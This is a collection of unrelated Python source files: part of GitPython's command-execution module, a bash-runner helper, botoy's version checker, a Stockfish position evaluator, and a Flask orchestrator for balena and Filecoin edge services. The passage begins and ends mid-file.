:raise GitCommandError: if the return status is not 0"""
status = self.proc.wait()
if status != 0:
raise GitCommandError(self.args, status, self.proc.stderr.read())
# END status handling
return status
# END auto interrupt
class CatFileContentStream(object):
"""Object representing a sized read-only stream returning the contents of
an object.
It behaves like a stream, but counts the data read and simulates an empty
stream once our sized content region is empty.
If not all data is read to the end of the objects's lifetime, we read the
rest to assure the underlying stream continues to work"""
__slots__ = ('_stream', '_nbr', '_size')
def __init__(self, size, stream):
self._stream = stream
self._size = size
self._nbr = 0 # num bytes read
# special case: if the object is empty, has null bytes, get the
# final newline right away.
if size == 0:
stream.read(1)
# END handle empty streams
def read(self, size=-1):
bytes_left = self._size - self._nbr
if bytes_left == 0:
return ''
if size > -1:
# assure we don't try to read past our limit
size = min(bytes_left, size)
else:
# they try to read all, make sure its not more than what remains
size = bytes_left
# END check early depletion
data = self._stream.read(size)
self._nbr += len(data)
# check for depletion, read our final byte to make the stream usable by others
if self._size - self._nbr == 0:
self._stream.read(1) # final newline
# END finish reading
return data
def readline(self, size=-1):
if self._nbr == self._size:
return ''
# clamp size to lowest allowed value
bytes_left = self._size - self._nbr
if size > -1:
size = min(bytes_left, size)
else:
size = bytes_left
# END handle size
data = self._stream.readline(size)
self._nbr += len(data)
# handle final byte
if self._size - self._nbr == 0:
self._stream.read(1)
# END finish reading
return data
def readlines(self, size=-1):
if self._nbr == self._size:
return list()
# leave all additional logic to our readline method, we just check the size
out = list()
nbr = 0
while True:
line = self.readline()
if not line:
break
out.append(line)
if size > -1:
nbr += len(line)
if nbr > size:
break
# END handle size constraint
# END readline loop
return out
def __iter__(self):
return self
def next(self):
line = self.readline()
if not line:
raise StopIteration
return line
def __del__(self):
bytes_left = self._size - self._nbr
if bytes_left:
# read and discard - seeking is impossible within a stream
# includes terminating newline
self._stream.read(bytes_left + 1)
# END handle incomplete read
def __init__(self, working_dir=None):
"""Initialize this instance with:
:param working_dir:
Git directory we should work in. If None, we always work in the current
directory as returned by os.getcwd().
It is meant to be the working tree directory if available, or the
.git directory in case of bare repositories."""
super(Git, self).__init__()
self._working_dir = working_dir
self._git_options = ()
# Extra environment variables to pass to git commands
self._environment = {}
# cached command slots
self.cat_file_header = None
self.cat_file_all = None
def __getattr__(self, name):
"""A convenience method as it allows to call the command as if it was
an object.
:return: Callable object that will execute call _call_process with your arguments."""
if name[0] == '_':
return LazyMixin.__getattr__(self, name)
return lambda *args, **kwargs: self._call_process(name, *args, **kwargs)
def _set_cache_(self, attr):
if attr == '_version_info':
# We only use the first 4 numbers, as everthing else could be strings in fact (on windows)
version_numbers = self._call_process('version').split(' ')[2]
self._version_info = tuple(int(n) for n in version_numbers.split('.')[:4] if n.isdigit())
else:
super(Git, self)._set_cache_(attr)
# END handle version info
@property
def working_dir(self):
""":return: Git directory we are working on"""
return self._working_dir
@property
def version_info(self):
"""
:return: tuple(int, int, int, int) tuple with integers representing the major, minor
and additional version numbers as parsed from git version.
This value is generated on demand and is cached"""
return self._version_info
def execute(self, command,
istream=None,
with_keep_cwd=False,
with_extended_output=False,
with_exceptions=True,
as_process=False,
output_stream=None,
stdout_as_string=True,
**subprocess_kwargs
):
"""Handles executing the command on the shell and consumes and returns
the returned information (stdout)
:param command:
The command argument list to execute.
It should be a string, or a sequence of program arguments. The
program to execute is the first item in the args sequence or string.
:param istream:
Standard input filehandle passed to subprocess.Popen.
:param with_keep_cwd:
Whether to use the current working directory from os.getcwd().
The cmd otherwise uses its own working_dir that it has been initialized
with if possible.
:param with_extended_output:
Whether to return a (status, stdout, stderr) tuple.
:param with_exceptions:
Whether to raise an exception when git returns a non-zero status.
:param as_process:
Whether to return the created process instance directly from which
streams can be read on demand. This will render with_extended_output and
with_exceptions ineffective - the caller will have
to deal with the details himself.
It is important to note that the process will be placed into an AutoInterrupt
wrapper that will interrupt the process once it goes out of scope. If you
use the command in iterators, you should pass the whole process instance
instead of a single stream.
:param output_stream:
If set to a file-like object, data produced by the git command will be
output to the given stream directly.
This feature only has any effect if as_process is False. Processes will
always be created with a pipe due to issues with subprocess.
This merely is a workaround as data will be copied from the
output pipe to the given output stream directly.
Judging from the implementation, you shouldn't use this flag !
:param stdout_as_string:
if False, the commands standard output will be bytes. Otherwise, it will be
decoded into a string using the default encoding (usually utf-8).
The latter can fail, if the output contains binary data.
:param subprocess_kwargs:
Keyword arguments to be passed to subprocess.Popen. Please note that
some of the valid kwargs are already set by this method, the ones you
specify may not be the same ones.
:return:
* str(output) if extended_output = False (Default)
* tuple(int(status), str(stdout), str(stderr)) if extended_output = True
if ouput_stream is True, the stdout value will be your output stream:
* output_stream if extended_output = False
* tuple(int(status), output_stream, str(stderr)) if extended_output = True
Note git is executed with LC_MESSAGES="C" to ensure consitent
output regardless of system language.
:raise GitCommandError:
:note:
If you add additional keyword arguments to the signature of this method,
you must update the execute_kwargs tuple housed in this module."""
if self.GIT_PYTHON_TRACE and (self.GIT_PYTHON_TRACE != 'full' or as_process):
log.info(' '.join(command))
# Allow the user to have the command executed in their working dir.
if with_keep_cwd or self._working_dir is None:
cwd = os.getcwd()
else:
cwd = self._working_dir
# Start the process
env = os.environ.copy()
env["LC_MESSAGES"] = "C"
env.update(self._environment)
proc = Popen(command,
env=env,
cwd=cwd,
stdin=istream,
stderr=PIPE,
stdout=PIPE,
# Prevent cmd prompt popups on windows by using a shell ... .
# See https://github.com/gitpython-developers/GitPython/pull/126
shell=sys.platform == 'win32',
close_fds=(os.name == 'posix'), # unsupported on windows
**subprocess_kwargs
)
if as_process:
return self.AutoInterrupt(proc, command)
# Wait for the process to return
status = 0
stdout_value = b''
stderr_value = b''
try:
if output_stream is None:
stdout_value, stderr_value = proc.communicate()
# strip trailing "\n"
if stdout_value.endswith(b"\n"):
stdout_value = stdout_value[:-1]
if stderr_value.endswith(b"\n"):
stderr_value = stderr_value[:-1]
status = proc.returncode
else:
stream_copy(proc.stdout, output_stream, self.max_chunk_size)
stdout_value = output_stream
stderr_value = proc.stderr.read()
# strip trailing "\n"
if stderr_value.endswith(b"\n"):
stderr_value = stderr_value[:-1]
status = proc.wait()
# END stdout handling
finally:
proc.stdout.close()
proc.stderr.close()
if self.GIT_PYTHON_TRACE == 'full':
cmdstr = " ".join(command)
def as_text(stdout_value):
return not output_stream and stdout_value.decode(defenc) or '<OUTPUT_STREAM>'
# end
if stderr_value:
log.info("%s -> %d; stdout: '%s'; stderr: '%s'",
cmdstr, status, as_text(stdout_value), stderr_value.decode(defenc))
elif stdout_value:
log.info("%s -> %d; stdout: '%s'", cmdstr, status, as_text(stdout_value))
else:
log.info("%s -> %d", cmdstr, status)
# END handle debug printing
if with_exceptions and status != 0:
if with_extended_output:
raise GitCommandError(command, status, stderr_value, stdout_value)
else:
raise GitCommandError(command, status, stderr_value)
if isinstance(stdout_value, bytes) and stdout_as_string: # could also be output_stream
stdout_value = stdout_value.decode(defenc)
# Allow access to the command's status code
if with_extended_output:
return (status, stdout_value, stderr_value.decode(defenc))
else:
return stdout_value
def environment(self):
return self._environment
def update_environment(self, **kwargs):
"""
Set environment variables for future git invocations. Return all changed
values in a format that can be passed back into this function to revert
the changes:
``Examples``::
old_env = self.update_environment(PWD='/tmp')
self.update_environment(**old_env)
:param kwargs: environment variables to use for git processes
:return: dict that maps environment variables to their old values
"""
old_env = {}
for key, value in kwargs.items():
# set value if it is None
if value is not None:
if key in self._environment:
old_env[key] = self._environment[key]
else:
old_env[key] = None
self._environment[key] = value
# remove key from environment if its value is None
elif key in self._environment:
old_env[key] = self._environment[key]
del self._environment[key]
return old_env
@contextmanager
def custom_environment(self, **kwargs):
"""
A context manager around the above ``update_environment`` method to restore the
environment back to its previous state after operation.
``Examples``::
with self.custom_environment(GIT_SSH='/bin/ssh_wrapper'):
repo.remotes.origin.fetch()
:param kwargs: see update_environment
"""
old_env = self.update_environment(**kwargs)
try:
yield
finally:
self.update_environment(**old_env)
def transform_kwargs(self, split_single_char_options=False, **kwargs):
"""Transforms Python style kwargs into git command line options."""
args = list()
for k, v in kwargs.items():
if len(k) == 1:
if v is True:
args.append("-%s" % k)
elif type(v) is not bool:
if split_single_char_options:
args.extend(["-%s" % k, "%s" % v])
else:
args.append("-%s%s" % (k, v))
else:
if v is True:
args.append("--%s" % dashify(k))
elif type(v) is not bool:
args.append("--%s=%s" % (dashify(k), v))
return args
@classmethod
def __unpack_args(cls, arg_list):
if not isinstance(arg_list, (list, tuple)):
# This is just required for unicode conversion, as subprocess can't handle it
# However, in any other case, passing strings (usually utf-8 encoded) is totally fine
if not PY3 and isinstance(arg_list, unicode):
return [arg_list.encode(defenc)]
return [str(arg_list)]
outlist = list()
for arg in arg_list:
if isinstance(arg_list, (list, tuple)):
outlist.extend(cls.__unpack_args(arg))
elif not PY3 and isinstance(arg_list, unicode):
outlist.append(arg_list.encode(defenc))
# END recursion
else:
outlist.append(str(arg))
# END for each arg
return outlist
def __call__(self, **kwargs):
"""Specify command line options to the git executable
for a subcommand call
:param kwargs:
is a dict of keyword arguments.
these arguments are passed as in _call_process
but will be passed to the git command rather than
the subcommand.
``Examples``::
git(work_tree='/tmp').difftool()"""
self._git_options = self.transform_kwargs(
split_single_char_options=True, **kwargs)
return self
def _call_process(self, method, *args, **kwargs):
"""Run the given git command with the specified arguments and return
the result as a String
:param method:
is the command. Contained "_" characters will be converted to dashes,
such as in 'ls_files' to call 'ls-files'.
:param args:
is the list of arguments. If None is included, it will be pruned.
This allows your commands to call git more conveniently as None
is realized as non-existent
:param kwargs:
is a dict of keyword arguments.
This function accepts the same optional keyword arguments
as execute().
``Examples``::
git.rev_list('master', max_count=10, header=True)
:return: Same as ``execute``"""
# Handle optional arguments prior to calling transform_kwargs
# otherwise these'll end up in args, which is bad.
_kwargs = dict()
for kwarg in execute_kwargs:
try:
_kwargs[kwarg] = kwargs.pop(kwarg)
except KeyError:
pass
# Prepare the argument list
opt_args = self.transform_kwargs(**kwargs)
ext_args = self.__unpack_args([a for a in args if a is not None])
args = opt_args + ext_args
def make_call():
call = [self.GIT_PYTHON_GIT_EXECUTABLE]
# add the git options, the reset to empty
# to avoid side_effects
call.extend(self._git_options)
self._git_options = ()
call.extend([dashify(method)])
call.extend(args)
return call
# END utility to recreate call after changes
if sys.platform == 'win32':
try:
try:
return self.execute(make_call(), **_kwargs)
except WindowsError:
# did we switch to git.cmd already, or was it changed from default ? permanently fail
if self.GIT_PYTHON_GIT_EXECUTABLE != self.git_exec_name:
raise
# END handle overridden variable
type(self).GIT_PYTHON_GIT_EXECUTABLE = self.git_exec_name_win
try:
return self.execute(make_call(), **_kwargs)
finally:
import warnings
msg = "WARNING: Automatically switched to use git.cmd as git executable"
msg += ", which reduces performance by ~70%."
msg += "It is recommended to put git.exe into the PATH or to "
msg += "set the %s " % self._git_exec_env_var
msg += "environment variable to the executable's location"
warnings.warn(msg)
# END print of warning
# END catch first failure
except WindowsError:
raise WindowsError("The system cannot find or execute the file at %r" % self.GIT_PYTHON_GIT_EXECUTABLE)
# END provide better error message
else:
return self.execute(make_call(), **_kwargs)
# END handle windows default installation
def _parse_object_header(self, header_line):
"""
:param header_line:
<hex_sha> type_string size_as_int
:return: (hex_sha, type_string, size_as_int)
:raise ValueError: if the header contains indication for an error due to
incorrect input sha"""
tokens = header_line.split()
if len(tokens) != 3:
if not tokens:
raise ValueError("SHA could not be resolved, git returned: %r" % (header_line.strip()))
else:
raise ValueError("SHA %s could not be resolved, git returned: %r" % (tokens[0], header_line.strip()))
# END handle actual return value
# END error handling
if len(tokens[0]) != 40:
raise ValueError("Failed to parse header: %r" % header_line)
return (tokens[0], tokens[1], int(tokens[2]))
def _prepare_ref(self, ref):
# required for command to separate refs on stdin, as bytes
refstr = ref
if isinstance(ref, bytes):
# Assume 40 bytes hexsha - bin-to-ascii for some reason returns bytes, not text
refstr = ref.decode('ascii')
elif not isinstance(ref, string_types):
refstr = str(ref) # could be ref-object
if not refstr.endswith("\n"):
refstr += "\n"
return refstr.encode(defenc)
def _get_persistent_cmd(self, attr_name, cmd_name, *args, **kwargs):
cur_val = getattr(self, attr_name)
if cur_val is not None:
return cur_val
options = {"istream": PIPE, "as_process": True}
options.update(kwargs)
cmd = self._call_process(cmd_name, *args, **options)
setattr(self, attr_name, cmd)
return cmd
def __get_object_header(self, cmd, ref):
cmd.stdin.write(self._prepare_ref(ref))
cmd.stdin.flush()
return self._parse_object_header(cmd.stdout.readline())
def get_object_header(self, ref):
""" Use this method to quickly examine the type and size of the object behind
the given ref.
:note: The method will only suffer from the costs of command invocation
once and reuses the command in subsequent calls.
:return: (hexsha, type_string, size_as_int)"""
cmd = self._get_persistent_cmd("cat_file_header", "cat_file", batch_check=True)
return self.__get_object_header(cmd, ref)
def get_object_data(self, ref):
""" As get_object_header, but returns object data as well
:return: (hexsha, type_string, size_as_int,data_string)
:note: not threadsafe"""
hexsha, typename, size, stream = self.stream_object_data(ref)
data = stream.read(size)
del(stream)
return (hexsha, typename, size, data)
def stream_object_data(self, ref):
""" As get_object_header, but returns the data as a stream
:return: (hexsha, type_string, size_as_int, stream)
:note: This method is not threadsafe, you need one independent Command instance per thread to be safe !"""
cmd = self._get_persistent_cmd("cat_file_all", "cat_file", batch=True)
hexsha, typename, size = self.__get_object_header(cmd, ref)
return (hexsha, typename, size, self.CatFileContentStream(size, cmd.stdout))
def clear_cache(self):
"""Clear all kinds of internal caches to release resources.
Currently persistent commands will be interrupted.
:return: self"""
self.cat_file_all = None
self.cat_file_header = None
return self
|
shell.py
|
"""Command execution in bash shells"""
import time
from . import config
from .logging import logger
def run_shell_command(command: str, log_command: bool = True):
"""
Runs a command in a bash shell and logs the output of the command in (near)real-time.
Args:
command: The command to run
log_command: When true, then the command itself is logged before execution
Returns:
Either (in order)
- False when the exit code of the command was not 0
- True when there was no output to stdout
- The output to stdout, as an array of lines
"""
import shlex, subprocess, threading
if log_command:
logger.log(command, format=logger.Format.ITALICS)
process = subprocess.Popen(shlex.split(config.bash_command_string()) + ['-c', command],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True)
# keep stdout output
output_lines = []
# unfortunately, only file descriptors and the system stream can be passed to
# subprocess.Popen(..) (and not custom streams without a file handle).
# So in order to see be able to log the output in real-time, we have to
# query the output steams of the process from to separate threads
def read_process_stdout():
for line in process.stdout:
output_lines.append(line)
logger.log(line, format=logger.Format.VERBATIM)
def read_process_stderr():
for line in process.stderr:
logger.log(line, format=logger.Format.VERBATIM, is_error=True)
read_stdout_thread = threading.Thread(target=read_process_stdout)
read_stdout_thread.start()
read_stderr_thread = threading.Thread(target=read_process_stderr)
read_stderr_thread.start()
# wait until the process finishes
while process.poll() is None:
time.sleep(0.005)
read_stdout_thread.join()
read_stderr_thread.join()
exitcode = process.returncode
if exitcode != 0:
logger.log(f'exit code {exitcode}', is_error=True, format=logger.Format.ITALICS)
return False
return output_lines or True
def sed_command(replace: {str: str}) -> str:
"""
Creates a sed command string from a dictionary of replacements
Examples:
>>> print(sed_command({'foo':'a','bar':'b'}))
sed "s/foo/a/g; s/bar/b/g"
"""
def quote(s):
return str(s).replace('/', '\/').replace('"', '\\\"').replace('\n', '\\\\\n')
return 'sed "' + \
';'.join(
['s/' + quote(search) + '/' + quote(_replace) + '/g' for search, _replace in
replace.items()]) \
+ '"'
if __name__ == "__main__":
run_shell_command('ping -c 3 google.com; ping null')
|
__version__.py
|
# pylint: disable=C0415,C0413
__version__ = '0.0.25'
def check_version():
def _check_version():
import re
from distutils.version import LooseVersion as V
import httpx
try:
resp = httpx.get(
'https://mirrors.aliyun.com/pypi/simple/botoy/', timeout=10
)
resp.raise_for_status()
except Exception:
pass
else:
versions = re.findall(r'botoy-(.*?)\.tar\.gz', resp.text)
if versions:
versions = set(versions)
local_v = V(__version__)
latest_version = max(V(v) for v in versions)
if local_v < latest_version:
info = f'\033[33m==== 当前版本为: \033[31m{local_v}\033[33m, 已有最新版本: \033[31m{latest_version}\033[33m, 请及时更新! ====\033[0m'
print(info)
from threading import Thread
t = Thread(target=_check_version)
t.setDaemon(True)
t.start()
|
stockfish_eval.py
|
import os
import chess, chess.uci, chess.pgn
import numpy as np
import threading
class StockfishEval:
"""
Evaluates board positions from a .pgn file in parallel.
Saves a npy dictionary of FEN positions and their Stockfish evaluations.
"""
def __init__(self,
stockfish_exe,
pgn_file,
score_dict_filename,
threads,
export_inc):
if not str(score_dict_filename).endswith('.npy'):
score_dict_filename += '.npy'
self.stockfish_exe = stockfish_exe
self.pgn_file = pgn_file
self.score_dict_filename = score_dict_filename
self.threads = int(threads)
self.export_inc = export_inc
self.score_dict = {}
self.import_hash_table('threads\\FICS\\known_scores_merged.npy')
def import_hash_table(self, dict_file):
# Attempt to load already processed boards
if os.path.isfile(dict_file):
self.score_dict = np.load(dict_file).item()
print('Imported hash table of length {}', str(len(self.score_dict)))
else:
print('No hash table found. Creating new hash table.')
def export_hash_table(self):
np.save(self.score_dict_filename, self.score_dict)
def eval_thread(self, thread_num, pgn_file=None):
engine = chess.uci.popen_engine(self.stockfish_exe)
if pgn_file is None:
pgn = open(self.pgn_file)
else:
pgn = open(pgn_file)
def export_thread_hash_table():
print('Saving progress for thread {} len: {}'.format(thread_num, len(thread_score_dict)))
filename = str(self.score_dict_filename) + '_' + str(thread_num) + '.npy'
np.save('threads\\' + filename, thread_score_dict)
engine.uci()
engine.setoption({"Threads": 1, "Hash": 64})
info_handler = chess.uci.InfoHandler()
engine.info_handlers.append(info_handler)
game_num = 0
games_processed_by_thread = 0
if pgn_file is None:
while game_num < thread_num:
chess.pgn.skip_game(pgn)
game_num += 1
game = chess.pgn.read_game(pgn)
thread_score_dict = {}
while game is not None:
board = game.board()
engine.ucinewgame()
print('Processing game {} on thread {}'.format(game_num, thread_num))
move_number = 0
for move in game.mainline_moves():
board.push(move)
# Check if board has already been evaluated
if board.fen() not in self.score_dict and \
board.fen() not in thread_score_dict:
engine.position(board)
try:
engine.go(depth=12, ponder=False)
except chess.uci.EngineTerminatedException as err:
print('Unexpected engine error:')
print(err)
engine.stop()
print(info_handler.info['score'][1][0])
print('----')
score = info_handler.info['score'][1].cp
mate = info_handler.info['score'][1].mate
# If Stockfish finds mate, then give an extreme score
if mate is not None:
if mate > 0:
if board.turn:
score = 10000
else:
score = -10000
else:
if board.turn:
score = -10000
else:
score = 10000
elif not board.turn:
# Adjust score if Stockfish is playing black's turn
score *= -1
thread_score_dict[board.fen()] = score
move_number += 1
# game = chess.pgn.read_game(self.pgn)
if pgn_file is None:
skip_to = self.threads + game_num
while game_num < skip_to:
chess.pgn.skip_game(pgn)
game_num += 1
else:
game_num += 1
game = chess.pgn.read_game(pgn)
games_processed_by_thread += 1
if games_processed_by_thread % self.export_inc == 0:
export_thread_hash_table()
def execute_parallel_eval(self):
procs = []
# If pgn_file is a list of pgn's then assign them to threads.
if type(self.pgn_file) is list:
for i in range(self.threads):
thread_pgn = self.pgn_file[i]
print('Thread ' + str(i) + ' started. PGN: ' + str(thread_pgn))
p = threading.Thread(target=self.eval_thread, args=(i, thread_pgn))
procs.append(p)
p.start()
else:
for i in range(self.threads):
print('Thread ' + str(i) + ' started.')
# p = Process(target=self.eval_thread, args=(i, ))
p = threading.Thread(target=self.eval_thread, args=(i,))
procs.append(p)
p.start()
for proc in procs:
proc.join()
if __name__ == '__main__':
evaluator = StockfishEval('Stockfish\\stockfish_10_x64.exe',
'data\\FICS\\ficsgamesdb_2017_chess2000_nomovetimes_80572.pgn',
'centipawn_scores',
16,
75,)
evaluator.execute_parallel_eval()
|
app2.py
|
from flask import request, Flask
from flask_restful import Resource, Api
import os
import subprocess
import requests
from threading import Thread
import json
import time
import yaml
# TODO differentiate between service_name used in balena and image_name used for filecoin
# TODO better comments
EDGE_IP_ADDRESS = "https://a6df793906bb9a28dc45199d4ed42843.balena-devices.com/"
CLOUD_HOST = "http://150.140.184.241:1880"
# MINER_ADDRESS = "ASSDF"
PORT = os.getenv("PORT", "80")
SECRET = "super_secret"
ID = "1234567890"
app = Flask(__name__)
api = Api(app)
@app.route('/orchestrator/service_customer/image/status', methods=['POST', 'GET'])
def service_customer_image():
if request.method == "POST":
message = request.json
image_status = message["status"]
image_name = message["imageName"]
image_hash = message["imageHash"]
miner_address = message["minerAddress"]
orchestrator.services_customer_contracts[image_name]["image_status"] = image_status
print(
f"Orchestrator -- Image { image_name} is {image_status} in the filecoin network")
if image_status == "stored":
thread = Thread(target=orchestrator.generate_contract_customer, args=(
image_name, image_hash, miner_address))
thread.start()
return "ok"
else:
return json.dumps(orchestrator.services_customer_contracts)
@app.route('/orchestrator/service_provider/image/status', methods=['POST'])
def service_provider_image():
if request.method == 'POST':
message = request.json
image_status = message["status"]
image_name = message["imageName"]
# image_hash = message["imageHash"]
if image_status == "downloaded":
thread = Thread(target=orchestrator.set_state)
thread.start()
return_message = "set_state()"
return_code = 200
else:
return_message = "unknown command"
return_code = 404
return return_message, return_code
# CONSUL HEALTH
@app.route('/orchestrator/health', methods=['GET'])
def orchestrator_health():
return "orchestrator v0.1", 200
@app.route('/orchestrator/contracts/debug', methods=['GET'])
def print_contracts():
data = {"service_provider": orchestrator.services_provider_contracts,
"service_customer": orchestrator.services_customer_contracts}
payload_str = json.dumps(data, indent=4)
return payload_str
# create_contract/testing --> wait(filecoin)--> /image_stored --> generate_contract_customer() --> /create_contract --> contract_setup()
# customer ENDPOINT
@app.route('/orchestrator/service_customer/contract/testing', methods=['POST', 'GET'])
def create_contract_debug():
# save file to filecoin_network
# this function should belong to Orchestrator class and be called as part of the contract process
# but for debugging, it will be called manually using a somple REST endpoint
if request.method == "POST":
data = request.json
image_name = data["imageName"]
service_provider_location = data["serviceProviderLocation"]
duration = data["storageDuration"]
miner_address = data["minerAddress"]
payload = {"image_name": image_name, "storage_duration": duration, "miner_address" : miner_address}
orchestrator.services_customer_contracts[image_name] = {
"contract_status": "pending", "image_status": "pending", "service_provider_location": service_provider_location}
thread = Thread(target=orchestrator.finterface_comm,
args=("POST", payload))
thread.start()
status = "ok"
code = 200
return status, code
else:
return json.dumps(orchestrator.services_customer_contracts)
# PROVIDER ENDPOINT
@app.route('/orchestrator/service_provider/contract', methods=['POST'])
def contract_provider():
data = request.json
print(data)
orchestrator.contract_setup(
data["imageName"], data["imageHash"], data["config"])
return "ok"
# Assumptions:
# 1) filecoin_interface and orchestrator share file directory
# 2) contract_setup --> finterface(request_file)--> file_downloaded --> load_image-->set state
class Orchestrator():
def __init__(self):
# self.miner_address = MINER_ADDRESS
self.services_provider_contracts = []
# [
# {
# "service_name": "",
# "config": {}
# }
# ]
self.services_customer_contracts = {}
# {
# "service1": {
# "contract_status":"pending,
# "image_status":"stored"
# }
# }
self.active_contracts = [] # same as contracts_services_provider
try:
with open("data/orchestrator_state_file.json")as f:
print("Orchestrator -- state file exists")
data = json.load(f)
self.services_provider_contracts = data["services_provider_contracts"]
self.services_customer_contracts = data["services_customer_contracts"]
i = 0
for service in self.services_provider_contracts:
self.stop_service(service["service_name"])
self.contract_interval(i)
i = i + 1
except FileNotFoundError:
print("Orchestrator - no file found, starting a fresh instance")
def _image2engine(self):
print("BalenaEngine API - load image")
def set_supervisor_state(self):
print("Supervisor API - set state")
self.balena_push()
def balena_push(self):
print("Communicate with node-RED backend - run docker-compose")
url = "http://150.140.184.249:1880/balena/push"
with open("data/docker-compose.yml", "r") as yaml_in:
compose = yaml.safe_load(yaml_in)
req = requests.post(url, json=compose)
status = req.status_code
print(f"Sent balena push command with response:{status}")
def start_service(self, service_name):
print("Orchestrator -- Supervisor API - start_service")
supervisor_url = os.environ["BALENA_SUPERVISOR_ADDRESS"]
key = os.environ["BALENA_SUPERVISOR_API_KEY"]
app_id = os.environ["BALENA_APP_ID"]
url = supervisor_url + f"/v2/applications/{app_id}/start-service?apikey={key}"
payload = "{\"serviceName\":\"" + service_name + "\"}"
while True:
try:
# req = requests.post(url=url, json=payload)
# status = req.status_code
command = 'curl --header "Content-Type:application/json"'
curl = command + ' "' + url + '"'
curl2 = curl + ' -d \'{"serviceName": "nodered-device-service"}\''
response = os.system(curl2)
if response == 0:
print(f"\nOrchestrator -- Started service {service_name}")
break
else:
print(
f"Orchestrator -- Tried starting service, got response: {response}, retrying in 10s")
except Exception as e:
print(
f"Orchestrator -- start service got error: {e}, retrying in 10s")
time.sleep(10)
# call to supervisor api
def stop_service(self, service_name):
print("Orchestrator -- Supervisor API - stop_service")
url = os.environ["BALENA_SUPERVISOR_ADDRESS"]
key = os.environ["BALENA_SUPERVISOR_API_KEY"]
app_id = os.environ["BALENA_APP_ID"]
url = url + f"/v2/applications/{app_id}/stop-service?apikey={key}"
payload = "{\"serviceName\":\"" + service_name + "\"}"
while True:
try:
command = 'curl --header "Content-Type:application/json"'
curl = command + ' "' + url + '"'
curl2 = curl + ' -d \'{"serviceName": "nodered-device-service"}\''
curl3 = curl + ' -d \'{"serviceName": "lora-appserver"}\''
response2 = os.system(curl2)
response3 = os.system(curl3)
# req = requests.post(url=url, json=payload)
# status = req.status_code
if response2 == 0 and response3 ==0:
print(f"\nOrchestrator -- Stopped service {service_name}")
break
else:
print(
f"Orchestrator -- Tried stopping service, got response: {response2}, {response3}, retrying in 10s")
except Exception as e:
print(
f"Orchestrator -- stop service got error: {e}, retrying in 10s")
time.sleep(10)
def finterface_comm(self, method, payload):
if method == "POST":
req = requests.post(url="http://127.0.0.1:" + PORT +
"/filecoin_interface/orchestrator/image", json=payload)
elif method == "GET":
req = requests.get(url="http://127.0.0.1:" + PORT +
"/filecoin_interface/orchestrator/image", params=payload)
print(req)
return 0
# call to filecoin interface service
# /filecoin_interface/orchestrator/ [get_image, store_image]
# payload:
# get_image (image_hash, image_name, minerAddress)
# store_image (image_name, duration)
def contract_setup(self, image_name, image_hash, config):
new_service = {}
new_service["image_name"] = image_name
new_service["hash"] = image_hash
new_service["config"] = json.loads(config)
new_service["service_name"] = new_service["config"]["serviceName"]
self.services_provider_contracts.append(new_service)
# download image from filecoin network
payload = {"imageName": image_name, "imageHash": image_hash,
"minerAddress": new_service["config"]["miner_address"]}
self.finterface_comm("GET", payload)
return 0
def contract_interval(self, index):
p = Thread(target=self.check_contract, args=[index])
p.start()
return 0
def check_contract(self, index):
service = self.services_provider_contracts[index]
interval = int(service["config"]["event"]["interval"])
while True:
try:
r = requests.get(
url=service["config"]["event"]["ip"] + "/orchestrator/health", timeout=10)
if r.status_code == 200:
print(
"Service Provider orchestrator checked for event, everything OK")
else:
return_code = r.status_code
print(f"Node is online but return code is : {return_code}")
raise requests.exceptions.Timeout
except requests.exceptions.Timeout:
print (f"Activating insurance contract..")
self.services_provider_contracts.remove(service)
self.active_contracts.append(service)
self.save_orchestrator_state()
self.start_service(service["service_name"])
break
time.sleep(interval)
def generate_contract_customer(self, image_name, image_hash, miner_address):
with open('data/new_service_config.json', encoding='utf-8') as f:
config = json.load(f)
config["miner_address"] = miner_address
config["event"]["ip"] = EDGE_IP_ADDRESS
configs = json.dumps(config)
self.services_customer_contracts[image_name]["image_status"] = "stored"
service_provider_location = self.services_customer_contracts[
image_name]["service_provider_location"]
payload = {"imageName": image_name,
"imageHash": image_hash, "config": configs}
r = requests.post(url=service_provider_location +
"/orchestrator/service_provider/contract", json=payload)
if r.status_code == 200:
self.services_customer_contracts[image_name]["contract_status"] = "inactive"
return 0
# if image is stored, send hash + to create_contract of other orchestrator
def save_device_state(self):
# get device_state
# append new state
# save overall state
with open('data/current_state.json', encoding='utf-8') as f:
self.target_state = json.load(f)
with open('data/new_service_state.json') as f:
new_service = json.load(f)
self.target_state["state"]["local"]["apps"]["1"]["services"].append(
new_service)
with open('data/new_state.json', 'w', encoding='utf-8') as f:
json.dump(self.target_state, f, ensure_ascii=False, indent=4)
service_name = new_service["serviceName"]
print(f"Device state updated with service: {service_name}")
return 0
def save_orchestrator_state(self):
self.orch_state = {}
self.orch_state["services_provider_contracts"] = self.services_provider_contracts
self.orch_state["services_customer_contracts"] = self.services_customer_contracts
self.orch_state["active_contracts"] = self.active_contracts
with open('data/orchestrator_state_file.json', 'w', encoding='utf-8') as fp:
json.dump(self.orch_state, fp, ensure_ascii=False, indent=4)
print("Orchestrator state saved to file \"data/orchestrator_state_file.json\" ")
return 0
def set_state(self):
# self.save_device_state()
self.save_orchestrator_state()
self.set_supervisor_state()
return 0
# requests to supervisor for new state
# _balena_push()
####### Filecoin Interface ############## Filecoin Interface ############## Filecoin Interface ############## Filecoin Interface #######
### API START####### API START####### API START###### API START###### API START###### API START###### API START####
@app.route('/filecoin_interface/backend/image', methods=['POST', 'GET'])
def filecoin_interface_image():
message = request.json
# print(f" Filecoin Interface -- Received request from backend: {message}")
if request.method == "POST":
image_hash = message["imageHash"]
image_name = message["imageName"]
image_status = message["imageStatus"]
miner_address = message["miner_address"]
if image_status == "ready2download":
print(
f" Filecoin Interface -- Image with hash [ {image_hash} ] and name [ {image_name} ] is ready to be downloaded")
scp_thread = Thread(target=scp_image, args=(
"download", image_name, image_hash, 0))
scp_thread.start()
status = "Started scp download"
status_code = 200
else: #stored, committed
communicate_orchestrator(
image_status, {"imageHash": image_hash, "imageName": image_name, "minerAddress":miner_address})
status = "data received"
status_code = 200
else:
status = "FUNCTIONALITY NOT FOUND"
status_code = 404
return status, status_code
@app.route('/filecoin_interface/backend/error', methods=['POST'])
def error_log():
message = request.json
error_object = message["errorObject"]
error_code = error_object["code"]
error_message = error_object["message"]
print(
f" Filecoin Interface -- Received error from backend:\nMessage: {error_message}Code: {error_code}")
return "error logged"
@app.route('/filecoin_interface/orchestrator/image', methods=['POST', 'GET'])
def orchestrator_store_image():
if request.method == "POST":
data = request.json
image_name = data["image_name"]
storage_duration = data["storage_duration"]
miner_address = data["miner_address"]
print(
f" Filecoin Interface -- \nReceived request from orchestrator: {data}")
